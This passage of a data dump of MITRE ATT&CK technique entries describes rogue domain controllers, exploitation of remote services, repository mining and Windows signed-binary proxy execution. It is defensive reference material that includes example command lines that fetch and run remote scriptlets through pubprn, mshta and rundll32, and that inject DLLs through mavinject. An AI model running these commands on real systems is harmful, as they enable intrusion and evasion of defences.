                              'Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters '
                              'passive backdoors)(Citation: Leonardo Turla Penquin May 2020)\n'
                              '\n'
                              'Filters can be installed on any Unix-like platform with `libpcap` installed or on '
                              'Windows hosts using `Winpcap`.  Adversaries may use either `libpcap` with '
                              '`pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` '
                              'options. Since the socket connection is not active until the packet is received, this '
                              'behavior may be difficult to detect due to the lack of activity on a host, low CPU '
                              'overhead, and limited visibility into raw socket usage.',
               'name': 'Socket Filters',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1207': {'attack_id': 'T1207',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may register a rogue Domain Controller to enable manipulation of Active '
                          'Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is '
                          'a method of manipulating Active Directory (AD) data, including objects and schemas, by '
                          'registering (or reusing an inactive registration) and simulating the behavior of a DC. '
                          '(Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate '
                          'changes into AD infrastructure for any domain object, including credentials and keys.\n'
                          '\n'
                          'Registering a rogue DC involves creating a new server and nTDSDSA objects in the '
                          'Configuration partition of the AD schema, which requires Administrator privileges (either '
                          'Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)\n'
                          '\n'
                          'This technique may bypass system logging and security monitors such as security information '
                          'and event management (SIEM) products (since actions taken on a rogue DC may not be reported '
                          'to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and '
                          'delete replication and other associated metadata to obstruct forensic analysis. Adversaries '
                          'may also utilize this technique to perform [SID-History '
                          'Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects '
                          '(such as accounts, access control lists, schemas) to establish backdoors for Persistence. '
                          '(Citation: DCShadow Blog)',
           'name': 'Rogue Domain Controller',
           'platforms': ['Windows']},
 'T1210': {'attack_id': 'T1210',
           'categories': ['lateral-movement'],
           'description': 'Adversaries may exploit remote services to gain unauthorized access to internal systems '
                          'once inside of a network. Exploitation of a software vulnerability occurs when an adversary '
                          'takes advantage of a programming error in a program, service, or within the operating '
                          'system software or kernel itself to execute adversary-controlled code.\xa0A common goal for '
                          'post-compromise exploitation of remote services is for lateral movement to enable access to '
                          'a remote system.\n'
                          '\n'
                          'An adversary may need to determine if the remote system is in a vulnerable state, which may '
                          'be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or '
                          'other Discovery methods looking for common, vulnerable software that may be deployed in the '
                          'network, the lack of certain patches that may indicate vulnerabilities,  or security '
                          'software that may be used to detect or contain remote exploitation. Servers are likely a '
                          'high value target for lateral movement exploitation, but endpoint systems may also be at '
                          'risk if they provide an advantage or access to additional resources.\n'
                          '\n'
                          'There are several well-known vulnerabilities that exist in common services such as SMB '
                          '(Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well '
                          'as applications that may be used within internal networks such as MySQL (Citation: NVD '
                          'CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169)\n'
                          '\n'
                          'Depending on the permissions level of the vulnerable remote service an adversary may '
                          'achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) '
                          'as a result of lateral movement exploitation as well.',
           'name': 'Exploitation of Remote Services',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1211': {'attack_id': 'T1211',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may exploit a system or application vulnerability to bypass security features. '
                          'Exploitation of a vulnerability occurs when an adversary takes advantage of a programming '
                          'error in a program, service, or within the operating system software or kernel itself to '
                          'execute adversary-controlled code.\xa0Vulnerabilities may exist in defensive security '
                          'software that can be used to disable or circumvent them.\n'
                          '\n'
                          'Adversaries may have prior knowledge through reconnaissance that security software exists '
                          'within an environment or they may perform checks during or shortly after the system is '
                          'compromised for [Security Software '
                          'Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will '
                          'likely be targeted directly for exploitation. There are examples of antivirus software '
                          'being targeted by persistent threat groups to avoid detection.\n'
                          '\n'
                          'There have also been examples of vulnerabilities in public cloud infrastructure of SaaS '
                          'applications that may bypass defense boundaries (Citation: Salesforce zero-day in facebook '
                          'phishing attack), evade security logs (Citation: Bypassing CloudTrail in AWS Service '
                          'Catalog), or deploy hidden infrastructure.(Citation: GhostToken GCP flaw)',
           'name': 'Exploitation for Defense Evasion',
           'platforms': ['Linux', 'Windows', 'macOS', 'SaaS', 'IaaS']},
 'T1212': {'attack_id': 'T1212',
           'categories': ['credential-access'],
           'description': 'Adversaries may exploit software vulnerabilities in an attempt to collect credentials. '
                          'Exploitation of a software vulnerability occurs when an adversary takes advantage of a '
                          'programming error in a program, service, or within the operating system software or kernel '
                          'itself to execute adversary-controlled code.\xa0\n'
                          '\n'
                          'Credentialing and authentication mechanisms may be targeted for exploitation by adversaries '
                          'as a means to gain access to useful credentials or circumvent the process to gain '
                          'authenticated access to systems. One example of this is `MS14-068`, which targets Kerberos '
                          'and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet '
                          'MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Another example of this is replay '
                          'attacks, in which the adversary intercepts data packets sent between parties and then later '
                          "replays these packets. If services don't properly validate authentication requests, these "
                          'replayed packets may allow an adversary to impersonate one of the parties and gain '
                          'unauthorized access or privileges.(Citation: Bugcrowd Replay Attack)(Citation: Comparitech '
                          'Replay Attack)(Citation: Microsoft Midnight Blizzard Replay Attack)\n'
                          '\n'
                          'Such exploitation has been demonstrated in cloud environments as well. For example, '
                          'adversaries have exploited vulnerabilities in public cloud infrastructure that allowed for '
                          'unintended authentication token creation and renewal.(Citation: Storm-0558 techniques for '
                          'unauthorized email access)\n'
                          '\n'
                          'Exploitation for credential access may also result in Privilege Escalation depending on the '
                          'process targeted or credentials obtained.',
           'name': 'Exploitation for Credential Access',
           'platforms': ['Linux', 'Windows', 'macOS', 'Azure AD']},
 'T1213': {'attack_id': 'T1213',
           'categories': ['collection'],
           'description': 'Adversaries may leverage information repositories to mine valuable information. Information '
                          'repositories are tools that allow for storage of information, typically to facilitate '
                          'collaboration or information sharing between users, and can store a wide variety of data '
                          'that may aid adversaries in further objectives, or direct access to the target information. '
                          'Adversaries may also abuse external sharing features to share sensitive documents with '
                          'recipients outside of the organization. \n'
                          '\n'
                          'The following is a brief list of example information that may hold potential value to an '
                          'adversary and may also be found on an information repository:\n'
                          '\n'
                          '* Policies, procedures, and standards\n'
                          '* Physical / logical network diagrams\n'
                          '* System architecture diagrams\n'
                          '* Technical system documentation\n'
                          '* Testing / development credentials\n'
                          '* Work / project schedules\n'
                          '* Source code snippets\n'
                          '* Links to network shares and other internal resources\n'
                          '\n'
                          'Information stored in a repository may vary based on the specific instance or environment. '
                          'Specific common information repositories include web-based platforms such as '
                          '[Sharepoint](https://attack.mitre.org/techniques/T1213/002) and '
                          '[Confluence](https://attack.mitre.org/techniques/T1213/001), specific services such as Code '
                          'Repositories, IaaS databases, enterprise databases, and other storage infrastructure such '
                          'as SQL Server.',
           'name': 'Data from Information Repositories',
           'platforms': ['Linux', 'Windows', 'macOS', 'SaaS', 'Office 365', 'Google Workspace', 'IaaS']},
 'T1213.001': {'attack_id': 'T1213.001',
               'categories': ['collection'],
               'description': '\n'
                              'Adversaries may leverage Confluence repositories to mine valuable information. Often '
                              'found in development environments alongside Atlassian JIRA, Confluence is generally '
                              'used to store development-related documentation, however, in general may contain more '
                              'diverse categories of useful information, such as:\n'
                              '\n'
                              '* Policies, procedures, and standards\n'
                              '* Physical / logical network diagrams\n'
                              '* System architecture diagrams\n'
                              '* Technical system documentation\n'
                              '* Testing / development credentials\n'
                              '* Work / project schedules\n'
                              '* Source code snippets\n'
                              '* Links to network shares and other internal resources\n',
               'name': 'Confluence',
               'platforms': ['SaaS']},
 'T1213.002': {'attack_id': 'T1213.002',
               'categories': ['collection'],
               'description': 'Adversaries may leverage the SharePoint repository as a source to mine valuable '
                              'information. SharePoint will often contain useful information for an adversary to learn '
                              'about the structure and functionality of the internal network and systems. For example, '
                              'the following is a list of example information that may hold potential value to an '
                              'adversary and may also be found on SharePoint:\n'
                              '\n'
                              '* Policies, procedures, and standards\n'
                              '* Physical / logical network diagrams\n'
                              '* System architecture diagrams\n'
                              '* Technical system documentation\n'
                              '* Testing / development credentials\n'
                              '* Work / project schedules\n'
                              '* Source code snippets\n'
                              '* Links to network shares and other internal resources\n',
               'name': 'Sharepoint',
               'platforms': ['Windows', 'Office 365']},
 'T1213.003': {'attack_id': 'T1213.003',
               'categories': ['collection'],
               'description': 'Adversaries may leverage code repositories to collect valuable information. Code '
                              'repositories are tools/services that store source code and automate software builds. '
                              'They may be hosted internally or privately on third party sites such as Github, GitLab, '
                              'SourceForge, and BitBucket. Users typically interact with code repositories through a '
                              'web application or command-line utilities such as git.\n'
                              '\n'
                              'Once adversaries gain access to a victim network or a private code repository, they may '
                              'collect sensitive information such as proprietary source code or credentials contained '
                              "within software's source code.  Having access to software's source code may allow "
                              'adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while '
                              'credentials may provide access to additional resources using [Valid '
                              'Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber '
                              'Breach)(Citation: Krebs Adobe)\n'
                              '\n'
                              '**Note:** This is distinct from [Code '
                              'Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on '
                              'conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code '
                              'repositories.',
               'name': 'Code Repositories',
               'platforms': ['SaaS']},
 'T1216': {'attack_id': 'T1216',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may use trusted scripts, often signed with certificates, to proxy the execution '
                          'of malicious files. Several Microsoft signed scripts that have been downloaded from '
                          'Microsoft or are default on Windows installations can be used to proxy execution of other '
                          'files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute '
                          'malicious files that could bypass application control and signature validation on '
                          'systems.(Citation: GitHub Ultimate AppLocker Bypass List)',
           'name': 'System Script Proxy Execution',
           'platforms': ['Windows']},
 'T1216.001': {'attack_id': 'T1216.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is '
                              'a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a '
                              'printer to Active Directory Domain Services. The script may be signed by Microsoft and '
                              'is commonly executed through the [Windows Command '
                              'Shell](https://attack.mitre.org/techniques/T1059/003) via <code>Cscript.exe</code>. For '
                              'example, the following code publishes a printer within the specified domain: '
                              '<code>cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com</code>.(Citation: '
                              'pubprn)\n'
                              '\n'
                              'Adversaries may abuse PubPrn to execute malicious payloads hosted on remote '
                              'sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second '
                              '<code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote '
                              'site. An example command is <code>pubprn.vbs 127.0.0.1 '
                              'script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature '
                              'validation restrictions and application control solutions that do not account for abuse '
                              'of this script.\n'
                              '\n'
                              'In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent '
                              'proxying execution from a remote site. This is done by limiting the protocol specified '
                              'in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker '
                              'which could be used to reference remote code via HTTP(S).',
               'name': 'PubPrn',
               'platforms': ['Windows']},
 'T1216.002': {'attack_id': 'T1216.002',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious '
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001) commands. '
                              'SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows '
                              'virtualizes applications (Microsoft Application Virtualization, or App-V).(Citation: 1 '
                              '- appv) For example, Windows may render Win32 applications to users as virtual '
                              'applications, allowing users to launch and interact with them as if they were installed '
                              'locally.(Citation: 2 - appv)(Citation: 3 - appv)\n'
                              '    \n'
                              'The SyncAppvPublishingServer.vbs script is legitimate, may be signed by Microsoft, and '
                              'is commonly executed from `\\System32` through the command line via '
                              '`wscript.exe`.(Citation: 4 - appv)(Citation: 5 - appv)\n'
                              '\n'
                              'Adversaries may abuse SyncAppvPublishingServer.vbs to bypass '
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001) execution restrictions and '
                              'evade defensive counter measures by "living off the land."(Citation: 6 - '
                              'appv)(Citation: 4 - appv) Proxying execution may function as a trusted/signed '
                              'alternative to directly invoking `powershell.exe`.(Citation: 7 - appv)\n'
                              '\n'
                              'For example,  [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands may '
                              'be invoked using:(Citation: 5 - appv)\n'
                              '\n'
                              '`SyncAppvPublishingServer.vbs "n; {PowerShell}"`',
               'name': 'SyncAppvPublishingServer',
               'platforms': ['Windows']},
 'T1217': {'attack_id': 'T1217',
           'categories': ['discovery'],
           'description': 'Adversaries may enumerate information about browsers to learn more about compromised '
                          'environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) '
                          'may reveal a variety of personal information about users (e.g., banking sites, '
                          'relationships/interests, social media, etc.) as well as details about internal network '
                          'resources such as servers, tools/dashboards, or other related infrastructure.(Citation: '
                          'Kaspersky Autofill)\n'
                          '\n'
                          'Browser information may also highlight additional targets after an adversary has access to '
                          'valid credentials, especially [Credentials In '
                          'Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a '
                          'browser.\n'
                          '\n'
                          'Specific storage locations vary based on platform and/or application, but browser '
                          'information is typically stored in local files and databases (e.g., '
                          '`%APPDATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles)',
           'name': 'Browser Information Discovery',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1218': {'attack_id': 'T1218',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may bypass process and/or signature-based defenses by proxying execution of '
                          'malicious content with signed, or otherwise trusted, binaries. Binaries used in this '
                          'technique are often Microsoft-signed files, indicating that they have been either '
                          'downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS '
                          'Project) Binaries signed with trusted digital certificates can typically execute on Windows '
                          'systems protected by digital signature validation. Several Microsoft signed binaries that '
                          'are default on Windows installations can be used to proxy execution of other files or '
                          'commands.\n'
                          '\n'
                          'Similarly, on Linux systems adversaries may abuse trusted binaries such as '
                          '<code>split</code> to proxy execution of malicious commands.(Citation: split man '
                          'page)(Citation: GTFO split)',
           'name': 'System Binary Proxy Execution',
           'platforms': ['Windows', 'Linux', 'macOS']},
 'T1218.001': {'attack_id': 'T1218.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files '
                              'are commonly distributed as part of the Microsoft HTML Help system. CHM files are '
                              'compressed compilations of various content such as HTML documents, images, and '
                              'scripting/web related programming languages such VBA, JScript, Java, and ActiveX. '
                              '(Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying '
                              'components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) '
                              'loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help '
                              'Executable Program)\n'
                              '\n'
                              'A custom CHM file containing embedded payloads could be delivered to a victim then '
                              'triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution '
                              'may also bypass application application control on older and/or unpatched systems that '
                              'do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug '
                              '2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)',
               'name': 'Compiled HTML File',
               'platforms': ['Windows']},
 'T1218.002': {'attack_id': 'T1218.002',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows '
                              'Control Panel process binary (control.exe) handles execution of Control Panel items, '
                              'which are utilities that allow users to view and adjust computer settings.\n'
                              '\n'
                              'Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the '
                              'latter are actually renamed dynamic-link library (.dll) files that export a '
                              '<code>CPlApplet</code> function.(Citation: Microsoft Implementing CPL)(Citation: '
                              'TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include '
                              'graphical menus available to users after being registered and loaded into the Control '
                              'Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed '
                              'directly from the command line, programmatically via an application programming '
                              'interface (API) call, or by simply double-clicking the file.(Citation: Microsoft '
                              'Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL '
                              'Malware Dec 2013)\n'
                              '\n'
                              'Malicious Control Panel items can be delivered via '
                              '[Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro '
                              'CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of '
                              'multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, '
                              'specifically CPL files, may also bypass application and/or file extension allow lists.\n'
                              '\n'
                              'Adversaries may also rename malicious DLL files (.dll) with Control Panel file '
                              'extensions (.cpl) and register them to '
                              '<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls</code>. '
                              'Even when these registered DLLs do not comply with the CPL file specification and do '
                              'not export <code>CPlApplet</code> functions, they are loaded and executed through its '
                              '<code>DllEntryPoint</code> when Control Panel is executed. CPL files not exporting '
                              '<code>CPlApplet</code> are not directly executable.(Citation: ESET InvisiMole June '
                              '2020)',
               'name': 'Control Panel',
               'platforms': ['Windows']},
 'T1218.003': {'attack_id': 'T1218.003',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft '
                              'Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to '
                              'install Connection Manager service profiles. (Citation: Microsoft Connection Manager '
                              'Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and '
                              'installs a service profile leveraged for remote access connections.\n'
                              '\n'
                              'Adversaries may supply CMSTP.exe with INF files infected with malicious commands. '
                              '(Citation: Twitter CMSTP Usage Jan 2018) Similar to '
                              '[Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may '
                              'be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)  and/or COM '
                              'scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: '
                              'GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This '
                              'execution may also bypass AppLocker and other application control defenses since '
                              'CMSTP.exe is a legitimate binary that may be signed by Microsoft.\n'
                              '\n'
                              'CMSTP.exe can also be abused to [Bypass User Account '
                              'Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands '
                              'from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP '
                              'Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP '
                              'July 2018)',
               'name': 'CMSTP',
               'platforms': ['Windows']},
 'T1218.004': {'attack_id': 'T1218.004',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may use InstallUtil to proxy execution of code through a trusted Windows '
                              'utility. InstallUtil is a command-line utility that allows for installation and '
                              'uninstallation of resources by executing specific installer components specified in '
                              '.NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be '
                              'digitally signed by Microsoft and located in the .NET directories on a Windows system: '
                              '<code>C:\\Windows\\Microsoft.NET\\Framework\\v<version>\\InstallUtil.exe</code> and '
                              '<code>C:\\Windows\\Microsoft.NET\\Framework64\\v<version>\\InstallUtil.exe</code>.\n'
                              '\n'
                              'InstallUtil may also be used to bypass application control through use of attributes '
                              'within the binary that execute the class decorated with the attribute '
                              '<code>[System.ComponentModel.RunInstaller(true)]</code>. (Citation: LOLBAS Installutil)',
               'name': 'InstallUtil',
               'platforms': ['Windows']},
 'T1218.005': {'attack_id': 'T1218.005',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and '
                              'Javascript or VBScript through a trusted Windows utility. There are several examples of '
                              'different types of threats leveraging mshta.exe during initial compromise and for '
                              'execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part '
                              'Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter '
                              'Analysis) (Citation: FireEye FIN7 April 2017) \n'
                              '\n'
                              'Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. '
                              '(Citation: Wikipedia HTML Application) HTAs are standalone applications that execute '
                              'using the same models and technologies of Internet Explorer, but outside of the '
                              'browser. (Citation: MSDN HTML Applications)\n'
                              '\n'
                              'Files may be executed by mshta.exe through an inline script: <code>mshta '
                              'vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code>\n'
                              '\n'
                              'They may also be executed directly from URLs: <code>mshta '
                              'http[:]//webserver/payload[.]hta</code>\n'
                              '\n'
                              'Mshta.exe can be used to bypass application control solutions that do not account for '
                              "its potential use. Since mshta.exe executes outside of the Internet Explorer's security "
                              'context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)',
               'name': 'Mshta',
               'platforms': ['Windows']},
 'T1218.007': {'attack_id': 'T1218.007',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe '
                              'is the command-line utility for the Windows Installer and is thus commonly associated '
                              'with executing installation packages (.msi).(Citation: Microsoft msiexec) The '
                              'Msiexec.exe binary may also be digitally signed by Microsoft.\n'
                              '\n'
                              'Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. '
                              'Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro '
                              'Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can '
                              'be used to bypass application control solutions that do not account for its potential '
                              'abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the '
                              '<code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft '
                              'AlwaysInstallElevated 2018)',
               'name': 'Msiexec',
               'platforms': ['Windows']},
 'T1218.008': {'attack_id': 'T1218.008',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. '
                              'Odbcconf.exe is a Windows utility that allows you to configure Open Database '
                              'Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) '
                              'The Odbcconf.exe binary may be digitally signed by Microsoft.\n'
                              '\n'
                              'Adversaries may abuse odbcconf.exe to bypass application control solutions that do not '
                              'account for its potential abuse. Similar to '
                              '[Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a '
                              '<code>REGSVR</code> flag that can be misused to execute DLLs (ex: <code>odbcconf.exe /S '
                              '/A &lbrace;REGSVR "C:\\Users\\Public\\file.dll"&rbrace;</code>). (Citation: LOLBAS '
                              'Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group '
                              'Nov 2017) \n',
               'name': 'Odbcconf',
               'platforms': ['Windows']},
 'T1218.009': {'attack_id': 'T1218.009',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted '
                              'Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to '
                              'register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) '
                              '(COM) assemblies. Both are binaries that may be digitally signed by Microsoft. '
                              '(Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\n'
                              '\n'
                              'Both utilities may be used to bypass application control through use of attributes '
                              'within the binary to specify code that should be run before registration or '
                              'unregistration: <code>[ComRegisterFunction]</code> or '
                              '<code>[ComUnregisterFunction]</code> respectively. The code with the registration and '
                              'unregistration attributes will be executed even if the process is run under '
                              'insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: '
                              'LOLBAS Regasm)',
               'name': 'Regsvcs/Regasm',
               'platforms': ['Windows']},
 'T1218.010': {'attack_id': 'T1218.010',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe '
                              'is a command-line program used to register and unregister object linking and embedding '
                              'controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe '
                              'binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)\n'
                              '\n'
                              'Malicious usage of Regsvr32.exe may avoid triggering security tools that may not '
                              'monitor execution of, and modules loaded by, the regsvr32.exe process because of '
                              'allowlists or false positives from Windows using regsvr32.exe for normal operations. '
                              'Regsvr32.exe can also be used to specifically bypass application control using '
                              'functionality to load COM scriptlets to execute DLLs under user permissions. Since '
                              'Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform '
                              'resource locator (URL) to file on an external Web server as an argument during '
                              'invocation. This method makes no changes to the Registry as the COM object is not '
                              'actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the '
                              'technique is often referred to as a "Squiblydoo" and has been used in campaigns '
                              'targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye '
                              'Regsvr32 Targeting Mongolian Gov)\n'
                              '\n'
                              'Regsvr32.exe can also be leveraged to register a COM Object used to establish '
                              'persistence via [Component Object Model '
                              'Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black '
                              'Squiblydoo Apr 2016)',
               'name': 'Regsvr32',
               'platforms': ['Windows']},
 'T1218.011': {'attack_id': 'T1218.011',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using '
                              'rundll32.exe, vice executing directly (i.e. [Shared '
                              'Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security '
                              'tools that may not monitor execution of the rundll32.exe process because of allowlists '
                              'or false positives from normal operations. Rundll32.exe is commonly associated with '
                              'executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).\n'
                              '\n'
                              'Rundll32.exe can also be used to execute [Control '
                              'Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the '
                              'undocumented shell32.dll functions <code>Control_RunDLL</code> and '
                              '<code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe '
                              'to execute. (Citation: Trend Micro CPL)\n'
                              '\n'
                              'Rundll32 can also be used to execute scripts such as JavaScript. This can be done using '
                              'a syntax similar to this: <code>rundll32.exe '
                              'javascript:"\\..\\mshtml,RunHTMLApplication '
                              '";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code>  '
                              'This behavior has been seen used by malware such as Poweliks. (Citation: This is '
                              'Security Command Line Confusion)\n'
                              '\n'
                              'Adversaries may also attempt to obscure malicious code from analysis by abusing the '
                              'manner in which rundll32.exe loads DLL function names. As part of Windows compatibility '
                              'support for various character sets, rundll32.exe will first check for wide/Unicode then '
                              'ANSI character-supported functions before loading the specified function (e.g., given '
                              'the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe '
                              'would first attempt to execute <code>ExampleFunctionW</code>, or failing that '
                              '<code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). '
                              'Adversaries may therefore obscure malicious code by creating multiple identical '
                              'exported function names and appending <code>W</code> and/or <code>A</code> to harmless '
                              'ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL '
                              'functions can also be exported and executed by an ordinal number (ex: '
                              '<code>rundll32.exe file.dll,#1</code>).\n'
                              '\n'
                              'Additionally, adversaries may use '
                              '[Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing '
                              'DLL file names, file extensions, or function names) to further conceal execution of a '
                              'malicious payload.(Citation: rundll32.exe defense evasion) ',
               'name': 'Rundll32',
               'platforms': ['Windows']},
 'T1218.012': {'attack_id': 'T1218.012',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe '
                              'is known as the Extension CLSID Verification Host and is responsible for verifying each '
                              'shell extension before they are used by Windows Explorer or the Windows '
                              'Shell.(Citation: WinOSBite verclsid.exe)\n'
                              '\n'
                              'Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved '
                              'by running <code>verclsid.exe /S /C {CLSID}</code>, where the file is referenced by a '
                              'Class ID (CLSID), a unique identification number used to identify COM objects. COM '
                              'payloads executed by verclsid.exe may be able to perform various malicious actions, '
                              'such as loading and executing COM scriptlets (SCT) from remote servers (similar to '
                              '[Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since the binary may be '
                              'signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass '
                              'application control solutions that do not account for its potential abuse.(Citation: '
                              'LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM '
                              'Registry)(Citation: Nick Tyrer GitHub) ',
               'name': 'Verclsid',
               'platforms': ['Windows']},
 'T1218.013': {'attack_id': 'T1218.013',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe '
                              'is the Microsoft Application Virtualization Injector, a Windows utility that can inject '
                              'code into external processes as part of Microsoft Application Virtualization '
                              '(App-V).(Citation: LOLBAS Mavinject)\n'
                              '\n'
                              'Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes '
                              '(i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), '
                              'allowing for arbitrary code execution (ex. <code>C:\\Windows\\system32\\mavinject.exe '
                              'PID /INJECTRUNNING PATH_DLL</code>).(Citation: ATT Lazarus TTP Evolution)(Citation: '
                              'Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft, proxying '
                              'execution via this method may evade detection by security products because the '
                              'execution is masked under a legitimate process. \n'
                              '\n'
                              'In addition to [Dynamic-link Library '
